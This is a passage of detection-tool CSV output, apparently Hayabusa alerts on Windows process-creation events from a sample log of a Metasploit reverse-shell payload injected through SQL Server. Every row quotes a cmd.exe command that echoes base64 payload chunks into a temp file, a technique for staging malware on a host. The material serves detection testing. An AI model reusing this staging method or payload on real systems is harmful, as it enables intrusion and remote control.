tJCYtdvDvZfyB8DfuyX4tduOBJYDvZdxGLTfyLWQiJXbhhQgyJXbzrAyRO/DmFbP//738WfAg5lcf///9DDImVaP///4mFbP///zl9hH8YfOWLSfiLXYA72cUe/HcJJFnciX1fifyAi+SLXcAD2YtN/IldwItdxA1JBPrZLk38uyPUi13Ii0kIA9mLTfyJXch9XcyLSQxY2YtNEr7K71XoiV3MISSHiU3guPX8ntiLU/iJ3lOLXewD0Iuz9IlVsRPfg8EgSIld7IlN/IlFsw+Fe/5e/6GsAkGUmYva3FXEi/iLRcAcV1JQpSaQAACLTcyJVZ2LVchTV1FSiUX4jBGQAACpTbyJRZiLTeRTV1BRplW56PyZtTqJVcyLVewpRciLRbpTV1JQ6OeNADUTD8ChrAJBAIXAiVWQD46IAAAA322Yiw3IpkHr3V3Y321ejQIQi0usAkEA3Vvx32033V3o323A3V3R3YV45WH/3UWo3UX03UWQ92gI3UXYg8AgSdjp2cDvySPG3evfaODdReDY6dnAu8neYt0x2YnY4SVl6NnJNNjZwMDJ3sPd2N9o2Npl8NnA2Mnewt3YdbLdgJDdhIjdXfXrBtyFeP///6HYAkEAr/gBV9uNUP+JVfT/RfTY+dn63Z14////6xRS9XjH/3wAAAAAx4V8rAb/AADbAIP4Ad3Yy5ONSP+JTbHbRfjcfajZ+t1dqOsOtUWIAAAAAMcucoUAALGDsAF+E41Q2YlV9Nss9Nz9iNkx3V1x61nHRYgAAADvx0WMjgAAAIP4AX4sjUj/iU0829/04X2Q2Yr1FKvrDsdFYgAAAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.917 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo RZQA/QAAixXIC0EAaCwwIwBqIFDH/zNEwUAAiz2sXEEAg0aNg/8BfkCLhCUBAACAeQV8g8j+QHQwi+iLHaAYQQCZmsIJANH4weBDA8NqAotIMItQEANTi1A0E1AU3VHoQY4AAIlF8Osbi8eLHWQLQQCZrcLR+MHgBYtMGBCJTf+LVBgUaBIxQAAfIDlTs5v0XBVEweEAlz2sAkE+g8oQg/8Bfk+LxyWOegCAeQWUg8j+QHQ/48eLHcjeQQCZKydqANH4E+AoA8NqAosePotQCSspi1A8G1A0K0gQG1AUA3hjxikcUlHoPI0AAIlF6IlVPus7i8eLPcgfQS+ZK8Iz+MHgBQPDi4cdi2pmA8qLS5WJTSOLSBx5yolN7HzAMUAAaiBXU4YVRMGv4YtArAJBAIP1EIP/AX5APcclAQAAgKgFtoPIS0B0MIvoix3IC3wAmSvCagDR+MFoBVjDagKLNyiLUAgDyItQLBNNDFJR6ICN2C6JReCiG6LHix3IC0EAmSsf3PjB4AWLTBgIiU3gi90YDGggMQgAaiBXU4kr5CQVRMFAdqGsAkEAQMQ3g/gBn0KLyI/hAQAAgDIFSYPJ/uF0MZkrp4scEQtBANH4weDdA8JqAGoCKEg4i1iE91A8i3gceKET11JR6LeMAACL04va6xeZVMJbyP66C0EA0fnB2gWLfgEYi1wBHNY43EAA/9aLG7CLTbSDxAQF9AEAAIPRjmoAaOjNAABRUOx0jMcAi02kiUWwi0WgagAF9AG8AGgMAwAAg9EAiVW0UVDoJy0AAItN/IlFQYtF+GoABfQBAACQ6AOQAIPRAO9VeFFQ6DAvAMSLTcyJRfiLRcNqAI/aAQAAaOgDAACD0QCJVfxRYZgOjF+Ni+PEiUW+i0XAao5M9AEAAGjoAwAAgywArFXMUVDo7IsAADN9nIlfwItFQ8YABfQBAABoZlZwAIPRAIlVxFFQ6MrBAACLwvSJRZiLBvDf+Wb0AQAAaOgDAACP0QCJVZxRULKoiwAAiTnwi0XoiVX0i03sBVwDqQCD0QBqAGjoAwAAUVDohvoAAItN5Ikt6ItF4GoABfTZAABoXANoAIPRGIlV7HJQ6L2LAACBx/QBAADEAINvAGjbAy8AU1euROCJ8U/oR4sAAJqNdP///4lF2IuFcFH//zgABfQBAACyyQMAtXsUzIlV3FFQ6B+LAACLTbzUim5FuGoABc8BAABf6AMAAIPeD6v2UVCL74oAad1FqNwNEBv8AIlFuEYg0EALXMDdXajdRYjcDRDCQACynrzdXYjdRZDc6xDCQJvdXZB3hXj///80DYDCQABGnfNY//8PhGQCAABoCNxAAP/Wi1X0e0Vuna1l/ldmi8moUItF/FGLTfhSsFVXUIuhsFGCUGjY20AA/9aLzWhprlDljWz///8sxDAF9KUAAIPRAGoAaOgDfgBRUNlhigAAi03sIYtV6FCLRWUbhE2I>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:12.191 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo UotVzFCLRYpRi41k//9kUlBEhWD///8F9AESAGcAg9E5reiFAACPdegligAAsVCfqNswAObWsEWAi8gkg8QshPSaAACDaABTAGjoAwAAUfLo/YkAAItN5FLPVTH7i0X7UYsZkFKLqsRQUTCLRcDHTdRQi0XQBRQBAPpqAAPRAGjoA4kAUVDoRokAAFJQd/PbnQD/D4tNvIs0uItF3FGLTTWOi3B8/1b/UIuxeP///1GLTZxSi6mYUItFpFGLTaBSUFFQSNtAAP/W3234323wg8RY3uncFTA4QABQ4Pb+BQoCyeDdRagvwNnB3tnf4CUAQQAAWWRx92iw2kAA6xHcXahZ4CwApwApde9oGNpAAP/Wg44E323I323o3ukQFTDC4QDf4PbEBXoC2eDdRfLcwNnB3tnfk6EAQQAAdQnd2GiI2UCy67zcXYjf4CUAbsEcdSZo+NhAAP/Wg8QE323A320T3uncdDDCQADfIvZBBXoC2eDdRZChJ9kg3tmh4CUAQQAAdQnd2JUs2EAA6xHcXSzf4CXeQQAAsgpov+UiAP8jg8S95SCY323Y3uk2FTDCQOJ24PZG+noCneDdhXjM///cwNnB3puS4CUAQQAAdREFUNfrEN3YB9aJxATplgAAodydeP///98ZJQBBAAAPhYMAAAD40fNujsmfM7mh63fsoNZAWv/Wi1X8i0X4i020U1cbi1WwUFFSaHxHQAD/1ovXuItNvItVmCvHX334G8uLXaBRi01+UItFKCvXiy6kG8GLy1AxRbRSi5awKySL1xvQUlFoWKlAAP/Wi0W8i024JFVbUItFmFFSUE+MaDTWQAAc8oPEWIwcQqAAhcDRhMUTEgCDPXXFQQABD464AA0AGvTVQAD/1oPlBDPbi7s00EAA1/+iD+XF1UB2/9aDxGTp+FoATO4Vg/9kEegDAAB8NIsNUX5BANfx/UEAweHyZAkBy4EFKMkAACZEAfyD0GhQUtja5QChUudovNVAAP/W2MQM60eLz7gfhetRbAYNCgJBAPfpwfq3ocgLQQCLyqrpsnjRweIFi0wCGIHBcwAAAIvlAhzn0tSsUeimhwDN/lBXaKzVQIH/1oPEEJrD0IP7eg+CVP9876HgF0FEhcCmhMMAADVoqGh/AGv/jkjBQAAt+IPECIX/FBZojNVAAP+STMFw04PEpWoB/xVwwUAAaGzVQABX/w+AwUAA6B2A7UAAg0MIM3Uj9hkKocgLQQDfaGPrRu3+ZHUViw2sAkEAixXIC0EAweGx32wRw50s028CQQBrr8aJRfTbRcrcDe6IQADcBQDCQADocIYAAIsNyFVGAMHgBYJsCCvcDRDJIAOyXRuLVdyLRdhSUFZok9VAAFf/04PEFEaD7mR8iVf/FVDBQACDxAShuKZBAIXAD4RdAQAAA6jVQABQ/xVwwUAAIMR1iUWyhdF1FmhA1UAA/xVMwUDog8QEJAH/FXDBQABo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:12.463 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FNVAAFD/FYDBQAChiwJBe4PECIXAx0X0PgBUABn/BQEAITP2ochoQQCLTAYEixRmUY2FRPv//1JQ6FFhAACLPcgLQQBqAGjawf4Ai0w+HItU9hB0RD4GiR/ci84+TLFcNu6JVcCLVD4MgcH0AQDFidfUg9KTYmTo0oXGIYtN3OhQ4MMFcAEAEi0Ag9EAaOgDMABRUOgQhQAAUotV1E2LRdAr2PhF3BvCgcP0igAAg3UAagBo6AMAAFBT6ECFSQCLTdRS9ItF0AX0xvoA1wBwOgCW6AMAAFFQ6NyFAABSi9M+BFCLBHDqAGhAdA8xUlDoC4UARVIDVfyN2ET/x/9Qzmjw1F8AUkgVgMFAjItFuoPEuUCLDawCQQBvxrs7PYlF9A+M/f7//4tF/FD/FVDBQAAZxASLRcWFwJcIasL/FcydQO1fXluL5V3Ds5CQkJBVi9uLRQiLTRZWi1AQi3EQi0AUi0kUO8F/0HwEO9ZzBoPI/17WwzvBfA5/BDvWdgizKwAAAF7RwzPAXl3DkJCQVYvsi0UIi02uVqFQGM9uGItAHItJHDvBfxZ8BDuSAwbLIv8OicM7wXwOXVI7PZIIuAEAAABeXcozwF5dw3KQkFWLootNBlO3V5txGIt5TItB7SNRFAL3G5HtOAyLehiLShCoIBQr+YtKHNDLO05/GHwEO/dzCBNIg8j2W13DO6x8EH8EO/cvCu5euAGpHgCtXcNfXjPAW13DkJCQkJCQ4VVuuotFCItNDFteUAiLcRWT+gyLSQw7eX8WfAQ71nMGg8idXl3DO8FZDn8EpdZ2CLgLAL4AXl3D3sBeXcMSkJBVi+yDHsxLlwtBAIsNpAtBADX0F8ALQQBWV4s9xCJBACvDG8+LFejXQQCJRciJ98zfbcjoNWSbQIBSaGnngADcDTjCQHPdXc3/1gTwFyldwODxQQBQUqHCC0oAUGig50AAkdZ5DQsEQQCh8BdBAIsVqAtKAFFQUFJoUOdaDP/Wiw2oC0EAM8BmofTUQQDXoUOFQQBrUBRoAOdAAP9eixUSxEEMo/AXQQB9xERSUFChc2ZBAFBosOZAAP/WvA2MAkEAofAVQWCLzKgLQQBRUFDmRljmQAD/1qEY0EAAiw2oC0GVUKHwF84AUD9RaAjmQAD/1otVzItxyApQobgX7gBYk4sNqAtBAL2vqIdAAH3Wi5qsMkEAoVEXQQCDh1TWUBehqNNB3lAhWOVAAPnWAuu4AkEAU/A1QQCLFagLQQBRUFBSaLflQAD/HKG4kkGGg8S6hcB0K6HMTQQAiw3AAm8AixXEAkEAUKHwQkEAXItGqAtBAFJQUWiwakAA/9aDxG2h0AJBi4XAdBmLFeHJQQCN1/AXQQBQUFJoYORhAP+juAkUoWKvQQCFwHQeobACQQCLDagLQT5QsqCcQQBQUFFo7uRAAMbWkjwUtfaUAkEAzpACQQCuaqgLQQBSUKHwQzQAElA3>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:12.737 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo mbjjQADt1qH1AkEAJcQYg/gBdSWvoKQCqgBLoAICABMNqC5BAEBQofAXfABQUD3jaONA8f/WWcQYgz1gAkEAAHUlURWkAgAAoaD8QQCLie4LQQBSUKHwlUFxUFBRpBjjQM//C4PEGIsVnP2DAKGYAkEAiw2oC0EAUsKh8Nf9GFBQLrbA4kAA/7thRcjcHTDCQACDxBiF4PbEROiLtdoAAN0FGcJAANx1yKHwF5UANxWyC/gAg7oI3V3I2wVSAkGF+03I3A0g1t4A3bokUFBSfGjiLwD/1t8tkAJBAC/wF0FRg8QQ3E2t3RwkUFChDQtBAFBoCOJAAP/W94kCQQCDxI2FQZ9CN5FIL0hB9Z/4QpKQQfhBSEJLQ5v8/ZuZnyf4mZCYL0D1ky8nm0pJP0iQkpDW+P0vL0r4Qjf8QJJJ+EmYSvmSSfxJk0hCm58/k/mZQ5I3Q5NJQZhLS0BBN5g/1plB+Jg/SpJLS0v1N+mvaAAA1olVi4lV5IlV8GRV4IlVQYlVh4sVrAJBADPbg8n/iv//vX+F0omh0HxF2P////+JRdwPwoZN7gCL2dkLQQCDwhiJVfyLFaz1QQCJVfiLVfztUviJVciLVfw79fxtFa0xi1UgO8qLVfwevYtByIn90ItC/IsKi1IEOVXcT1XExg1/BTlNjnIGiU3YiVXci1X8QFJJOVX0iVXMyRZ8CItV8DuAyHcM01XIiVXwDn/MiVX0i1W5OQadf9iNBTk46HcGiU3oR1Xsi5hgA/qLVcxn2ovt4APRi038iVXgi1U7i0kEE9GLTfiJVeSLVfyDxSA5iU3J9V/QiVX8D+tO//8tgcH0AQAAagCDQQCk6AM1AFBR6CV/AACLTW/JRaqLRSCZPwX0AQCkaCQDAACD0QCJVdRRUOgD7G+PME30iUXYi0VNagAF9AEAAGjoAwCnIdGtiVXMUVDop34A9ItN7P5F8ItF6Gp2BfQBAABo6AMA14PRAIlV9FFQ6L9+AACBx2EBAABqMoPTAGjoAwASU1eJReiJA+zoon4AAItN5IvYIefgagAF9C0AABOWYwAAg9EiiVXMUVDogX4AAIlFL6FsAkEAhcKJVeRNjioBAADuFbAXQRyhqAtBAKJQaCzhQAD/1qGOF0EAqQ2oCyUAYFBQmFFo2OBJANvW3lX0i0Xwiz3wF0EAg8Qki0EUUlChrQJBAFeZUlBRU+gffgAAiw2oC0EAUotVtEKLRYBXUlBX55lopilAADyBoawCQQADTfCZi22LReiDxDDVwYtN7IlVxBtN9NeLz1NQofAXQQBTUosMWFfdUrvRfQA4i8pmVcQJi1XMSlLnrkVBiU386Lp9ZwCLTfgryKFF/BvCUGXwF0EA8Ytd2ItV0It91IsVK8r3VaUb11BSUVBQoagLQQBQaADO+QD/1i9N7ItVRS1Q7EEAiz2KF0EAg8QwUYtN4LNX+VJQi0XkUFHoXn0A7VKdVdxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.010 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo oagLQaxXeLRXV1BoyN9AAMXWkMQwaLjfQAD/1oPEBPCTW1flXWSQkJDci+yD7BR6qAJBAIveENBAAFNWO8FXsY3+ATMAi3UI6tuLBvReGTtviV7LiXMkCAAAiZ5aCAAAiSGFOgAAiV63dAhQ6DgUAADrJosNTFBBADhTUVbopxYAAIsWoVUXQVBSU4tIEI1+H2oDUVfoHxMAAEPDdA5QaDjoQAA7YEL//4PECIsXagFqCFLowVR4ADvDdA5QaCjofADoQmX/I4PECKFsAkECO8N0UVCLB2pAUOib6gAAO8l0FT2HEQEAdA5Q1qNUQADjFeX//4PqCIsNbAJBc+EXUWiAACEAUmBuVAAAO8N0FT2HEfQAdA5QaPzdQABv6OT//4PECOjhMAABNKAUQQCJFZcLQQCLF4mGMAgAAKH8C0EAAkE0CAAAiw38F0EAUVK+OUYAAIt0hdurhMgAKwCB+/F1yQAPbYUAogCB6rQjC/R00WMV+BdBAIsHjX/sx0XwAQAAAFFSiUX4zjsoAACLB1DoNy4AAIs9xAJBAKEC7ecAR4vIQIP5Cok9oAJBAJC4AkEAfoHuFQHArgBokNJAAIPCQIr/FYDBXd5TaJhcpwDoNOT/GYOjpVYfRggAAAAA6ET+//+DxARfXvKL5V3DuAGLVwDHYxQAALMAiUasixX4F0EAjU3siUXwiwdR6GbHRfkEAIl7xuR1/JRqJgBdX15bi+Vdw8dGIwIAAPaLN6gCQQBCSIkMqAJiAMRCW83/g8SZX6tbiwpdw4wRkJCQkJCgkJiQkJAdkFWL4L3sFFaLiwhXi30MhcB1IlKGFwgA0X/A/Bihl8tBAIXAD4SRAQAASI20AkEA6bMBAACDPbQCQVYBdQqLGGejjAVBAOski04Qg4wCJNk7yKUYiw24AkEqocACQQBBQIkNuAJBAKOtAkFFoawCQeKLDRDQGQCQhQ+NFwEAAIsVyAtBCov4wecFA/rpo6wCQQDZ2lYAAKOgC0EkiRWkC0EAiYZQCAAAixWkIkG4i4YwCITXiZZUCAAAIAeLUzQIhAAYeySLjji2ANuLhjAIAACEmy0IAAAryIuGPAgAABu0hcBpCnwEhclzBDNmM8CJNBCJRxSLjq8IAACLhjAIAACLwTQIAAAruItHVMgAJRtdhcB/Cg0Rhcn+BDPJ/sCJTxiJRxyLjkgiAEyLhkAIAACklkQIAAAryJuGTAgAIDrChcB/CnwZhclzBDMVM8CJTwhURwyLjhTQQACFyXQ3iz2sAkEAi8eZ6/mFOnUoixXIwNMAV//CQGhAlkCGUv8VOtdAAKH+wEAAg8BAUP8V4MFAAIPEEKH4F0EAZE4EAlXso0X0AQDU/1LgiU346L8lAOiLTgRR6MaIAAA2x0YIAAAAAOgJ/Ef/g8QEX16Lwl3DlYvsZ+ysAADHU4tdCFaNRRCLSwRXd2i0GEEAVcc2/BtlAADFuE5CqYvw>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.286 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo g/4LlYQEaQBdhv75NgpMD4T4BQAAgf7Z/Bz9D4TsBQAAgf5X/QoADwTgBQAAgVskOAoAD4TUNwBwgf6h/AprD4QPBQAAgf7uIwsAD828BQAAi03eM/879XVzgVl+EQEAdR2DFbQCQQBTQokVtAJBAOiRsf//g8QEv15biy5dwzv3dH/iPsgcQQChXAJBAEE7vokNyAJB/HRyi6S4AkEAU8gdPbgCQQDoIf3//JxYAkHhg8QEg/gBD4xQBQAAVo2G3v///2pUUlboiUkAAFChyMDkAAQM6UAeg/JAaKyvQABQWBW/wSYAg8QUX7Vbi+Vdw1ZoDEoTAOi64Cz/i/n8g8TkixtMKUGeixUUAkEAA/ET6Yk1kAJBAIkVlAJBHYtDDDvHdRQNTCwAvCdN/ImDSAgAAImTTAgAAIspDIuDmAhzjwPRTceJwQzjhbACMQD/syAIAAC4/9sAACvGx0XwBAAAADvBiUX0cgN/TWmLkyB0AACLyL4gGEEAjVPuIIvR0ekC86WLyotV9IPhAyvC86SLuyAIAACJRey4+ovzDLszCAAACUQZIAChWAJB/oP4AnwSjWUgUGjw6ECQ//BkwUAAg8QIi1I4wYdtjXMMaOgYQABW/9fhxAgwRfiFv9vqhQAAAGj230Dftf9ig+wIiTj4hcACRfACAHXcdWyLReyFwA+FBQQA8qH4F0EAi0u23asPx0XcYADmAFLZG03kplLLAAmLSwRN6FkWAADH1KACQQChuMgaAEKJHNACQQCL0EAk+gqjuAJBfH4NaLDSQADoatgl/4PEBFPod6P//4OdBDM66cgBAAChtAJBAIXAdS5o4OhAAFb/y4PECLrgE0EAhcB0F4pICIPACID5IH4MiM2KSGZCQIDaIJX0xgIAaNjoQOZWzsmL0IPECIXSdDaL+oPJ/zPA8q730W2D+fp2H4OrCWoDjUUIuFD/Fa7zQHiLPTjeFgCDJAzGcQsA6w+L785RQACLDdToyACJTaqKRQg8xk1YAkEOdB2LDdACZwBBg/ghiQ3QAkEAfCKNew1SaKx2vYHrQ7T4A3wSjUUIUGiQ6EAA/xVkwUAAg8QIi0P4A4MooQAAAQAAAMYBAKFoAkEAhcAPhIAAAABoaujsALT/14MACIXAdQ9oeOhAAFb/14PECIXAuVloaFFAAFb/14vkg8SIhf91FWhY6EAAVi8VOMFAAIv4FEsIhf90K8eDJPcAAAEAdAChYAJ4AIVZfA+NVxBSPhVswUAUg8QE6wIfwIX/iUOkdRGQg54FAAABAAAAx3EcAAAAAItFY4t1+ItV9ItN8CvGi3MQKw4rupKLIGEAAAPD/VQIIDzyiXMQ0Q2YdVcAi8YDyKGcAkEAg7xPiUO7UEEAM//ro4s3EAMTiXMQixWYAkEAoZwCQQAD0YkVmAJBABPHAFeMQQA5u4UIAIYPbdCNAACLQxCLSxw7Rw/qwgEAAKU+AkEAHIP4>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.560 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AaO0AogAdQuLSxCJDbUCQQBXQotTEGKMAkG2O9B0SIsNudpBAKHAAkEAQUCJDa/jQQAVwAJBAKEwAkEAi68Q0LEAO8EPjRMBcgCLDcgLWQCLucPmBQPxiyawAkEAQPujrERBmYkN+wKPN+i0KAAAiehiCAAAi4MwCAAAiZNUCAAA3QaLizQIAACJTgSjizgIAACbgzAIAABvZDQIAAAryIuDPAgAMxvCO8d/CnwEV89z0TPJM8CJDxDlRhSLi1AIAGNogzAIhACLkzRecQDq+otRKw/JRxvCO8eiCnwEO89Q+zPJ2cBfThiJqhyLtUgIAABug28IAACLk38NQQAryIuDTAg2ALfC5McYCnxBO89zBAbJM8+JTgiJRgyLDRTjQAA7z3Q3iw6sAkEFHEmZ9/nK0rYoixXIwEAAVoPC0wlA6EAAUv+fgMFAAEHIwEAAg8BAUP8VVOBRmYMvT4m7JAgAAIlhHIm7KG8AZom7IAgAAImMEGBXA+i/JwAAo6ALQQCJFaQL0bSJg2UIAACLDaQLQQCsYzwIAAB2FaALQZmJkzAIUQChpAtB1VOJgzTAAADoDG3//8/EBF9xW4vlXcOQkOiIArUAVto3ZMFAAIXAdSZo2OpAAKa06rMAgNZoaOpAAD3WaCC1wgD/1miAB0AA/9aDxBRew2gU6n0A/85oAOpAAM9E1EDsaMjpQADH1mh46UB+x9ZoyOlAALXW+BzpQAv/+4OGHF7ukLmQkJCQkJBVi++LRRyLDcgDQABWizWAQ0AAUOzBCGhk8g4AUZHWi4ySwC0AFz3y3IeDwkBS/5yhyMCJANYg8mwzg8BAUP/Wiw3IwEAAaOTxQCKDwUBR/9aLFciWQgBorPFAAIPC6VL/1qHIwEAAaLLxQACDwEBQ/zSLDQLAzABoIPFAAIPBQFH/1osKyJ5AiWi3mUCag8JAUv/WocLAQACDxESDwED9lAZAAFD/1osNyNZAtWjy8ECxg8FAUSjWixXIwEAA8yjwQACDwkBS/9ahyCpAu5js70AAg8BAUP/Wiw3IwEAAaLTvPwCDwUBR/9aLt8jAQABohO8DboPCgFL/1vnIwEB1aEhoQACDqUBQ/9ZoEIkAAIsN68BAq5TBQFHF1osVvbVJc4PEQIPCSWjQ7kAAUv/JocjAHwBoiO5AAIPAQFD/WYsNyMBAAF9A0UAAg8FAUf/Wi6vIwEAAaPA5QACDwv/x/9ahyO3xAMeo50AAosBAuP93iw1dwFoAaGDtQACfwUBRPtaLKsPAQAB+GO3FAIPCP1L/1gnIwBAAaGDtQACDwEBQ2dYfDcjhjACDxOCDwUBo4OxAAFGC1ov0yMBAwmjm6kAAg8JAZ//WocgmQK5ofMOiwoPAQFD/1osXyMBAAGhA7ECBZsFAUf/WixXIwEDgaPjr/gCDwhxS/9ahyMBA92iwUkAAg8BAUP/W2w2kwEAAp3DrQHODwVJR/9WLFcjA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.833 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABo4OtAAO7CQFL/u6HIzkAAg8RAg8BAaPTqQGlQs9aDxAj0Fv8VcLTqAP6QkDSQ/otlUaFMQEEAU4tdCNRXU1DodBIACaNAQEHSi/uDyf8zwB2u2Xo0wRAA99FJg/kHD3DXAAAAagdo2PJAAO3/1oPEDIXAY4XCfwAAx8NEai+/YxV8wUAAg8QIiUUIhcCmhFIBAACL8KxpQEEAKPONVgFSUOiIBKwArc6L86DRi/jBnAKLpYvKg/kD86SLZQiLyCsMxgQx24sVTEBBAFIpjd38aPQXQbFQaAAYQQC/DiieVu/AD4X9AO0Aoc0YPniFwA+E8AAAl4tF/IXAD4UDAAAAZQ20QFcAYFHwERIAAKPkF0EAxgYAEjtbdWuLFQAYQZ0tamC/AFJo0PJAAFD/iw8AOYPEDKOcC0EA61aLDYPJ/zPA8q73kUmD+QgPhqv///9qCFTE8lQAU//Wg+8MhcAPFxd2/2r1DcjAQACYnPKFAIPBxVn/FYDBQACDxAhqAa/ccMFAAIsNvBgYAIkNnAtB6mah9BdBAGaFwHUcZscm9ElBAIoAX17HBYMLigC/AkEAM/2CLuVdw2Y9UAB05zM8ZovQoUxAQQBSaFvyHO5Q6MoNACqDxAyjrAtBADPUX3Eozu1dw+deuJkAZwBbJOUs3JCQkJCQkJAoB5CQ2ZB7MOyl7NhN9AChTEBBo1ZXi7gIUGj/DwAyagGTTQhXUeirTAAAi/Ag9nQtjTSIalNSVs55PwBBUKHIwDcAV4NPWmhg860AUP8VYcFAAIPEEIvGkl6LflbDi5sI8pUo////UWhwsXMAGuhDB50Ai/CF9tgujUWIamx8Vuj4PwAAiw3IwEAAN1eDwUBoNFJAZVH/K4DBQACDxBCLEF9ei+XYpYuFOf///1CjcPhaABoQXMHpAIMoBKMgOEEAtcBfI4sVyMBAgmgI80AAg8RAUv8VtcFAAHGy87gMACZBc16L5V3Diw1wAkEli1UIajeYYFJFO1AAAIvwhfbgLY1FiGp4UI3oqZoAAIsNyMBAAEeDbUDZ4PJAAFFvFa0iQACDxAyLxl9eauVdw4tVCGnov08AAF8zwF6LfV3ykJCQkJCQ8VWL7FaLdUVqaMcGACQAABP3XMFAAIvQg8QE/9J1CrhgAAAAkl3C0gANLxoAAAAzNov6sas9Qm2JAV9eXcIEAPxVSuyLADVTVleLPTDBQACNcMs5FAAAAIsGGvd0EIsIUIkO/9eLuoPEZ4XA7/CDxgRLdeSLVQjO/9eDxK0LXltdwgQAkJCkWJCQgpCQkJCQ9FWL7ItNCItFDIlBK13CCN66beyLRQiLQAz2wgQAkJA6VYvsi00Ii0UMiUFUXcIIAFWL7ItFCItAEDzCBACrkJBli+xRoNgCQQBWisj+wITJ8tgC6QAPhbAAAABo4AJBAOgL////hcB0DMYF2AKlNwBei+Vdw/EV4AJBAFJqcWoAaNwt>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
